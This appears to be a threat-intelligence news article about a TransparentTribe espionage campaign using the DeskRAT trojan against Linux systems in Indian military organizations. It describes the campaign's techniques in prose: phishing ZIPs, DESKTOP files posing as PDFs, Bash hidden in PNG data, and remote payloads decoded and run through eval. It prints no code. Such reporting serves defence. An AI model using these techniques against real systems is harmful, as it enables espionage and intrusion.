Cybersecurity

A cyber espionage operation by TransparentTribe, a group with ties to Pakistan, has targeted Linux-based systems within Indian military and defense organizations. The operation, documented by CYFIRMA in July 2025 with activity traced back to June 2025, features a Golang-based remote access trojan known as DeskRAT.

Technical Details

The campaign employs a multi-stage delivery mechanism initiated through phishing emails containing malicious ZIP archives. These archives are disguised with names designed to evade detection, such as “MoM_regarding_Defence_Sectors_by_Secy_Defence.”

Upon extraction, the ZIP files reveal a DESKTOP file masquerading as a PDF document, complete with a PDF icon. When executed, this file initiates a complex infection chain that establishes persistent remote access to the compromised systems.

Research conducted by Sekoia analysts identified and analyzed the evolution of the campaign, discovering updated infection chains with new samples in August and September 2025. YARA rules were implemented to track these activities.

Infrastructure and Obfuscation

The technical infrastructure supporting this campaign has evolved from directing targets to ZIP files hosted on cloud services to using dedicated staging servers. This shift indicates an effort to avoid reliance on third-party platforms that may be monitored or suspended by security teams.

The campaign utilizes an obfuscation technique within the DESKTOP file, hiding malicious Bash commands among commented PNG image data. The payload is concealed between large blocks of image data, obscuring it from casual inspection.

The Bash one-liner executed upon file activation orchestrates a multi-stage payload delivery process, including downloading an encoded binary from a remote server. This binary undergoes dual decoding before executing through eval, gaining control of the system.

Simultaneously, a decoy PDF document is displayed to mislead users while the RAT establishes itself on the system.

DeskRAT Features

DeskRAT communicates with command and control servers via WebSocket connections, allowing real-time interaction with compromised systems. Its Golang implementation ensures cross-platform compatibility and enhanced persistence capabilities, making it effective against diverse Linux environments within Indian military infrastructure.